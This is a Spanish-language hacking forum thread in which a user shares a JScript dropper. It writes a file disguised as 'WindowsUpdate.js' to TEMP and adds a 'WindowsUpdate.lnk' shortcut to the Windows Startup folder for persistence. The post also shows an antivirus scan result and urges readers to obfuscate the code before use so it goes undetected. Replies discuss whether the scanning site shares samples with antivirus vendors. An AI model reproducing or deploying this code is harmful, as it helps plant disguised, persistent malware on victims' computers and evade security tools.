Hola buenas chaval@s.
Bueno me presento soy arduo, en udtools q en paz descanse, y en indetectables tenia otro nick, bueno siempre fui modder, aunq nunca tuve ese rango, me gusta modificar las cosas, y hoy os voy a dejar un script en javascript que modifique hace 2 años, nunca lo publique en ningun lado, basicamente cogi codigo de diferentes scripts y cree ese, esto lo q hace es crear un archivo.js en TEMP y un archivo.lnk en STARTUP, añadirle persistencia hablando en plata. A dia de hoy este es el scan.
(https://antiscan.me/images/result/IA3FxqcFEwuF.png)
Aviso que tiene mas de un error, corregirlo... Los errores son muy simples, si posteo mas cosas se iran agrandando xD
https://github.com/arduo93/JsFileDropAndStartup
var strr = new ActiveXObject("Scripting.FileSystemObject")
var strtwo = WScript.CreateObject("WScript.Shell");
var temp = strtwo.ExpandEnvironmentStrings("TEMP");
var strtres = strr.CreateTextFile(temp +"WindowsUpdate.js", true);
strtres.WriteLine("Ur js code");
strtres.Close();
strcinco = strtwo.SpecialFolders("Startup");
var strcuatro = strtwo.CreateShortcut(strcinco + "WindowsUpdate.lnk");
strcuatro.TargetPath = WScript.ScriptFullName;
strcuatro.Description = "Shortcut WindowsUpdate"
strcuatro.WorkingDirectory = temp +"/WindowsUpdate.js";
strcuatro.Save();
Se me olvidaba, no se si esta en la seccion correcta, y otra cosa, obfuscar el codigo antes de usarlo, q cualquiera q lo lea sabe q hace.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Se me olvidaba, no se si esta en la seccion correcta, y otra cosa, obfuscar el codigo antes de usarlo, q cualquiera q lo lea sabe q hace.
¿La web antiscan.me comparte muestras con las compañias de AV?
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
¿La web antiscan.me comparte muestras con las compañias de AV?
Sí
Es común la retroalimentación y convenios entre estos tipos de sitios y las compañías de AV.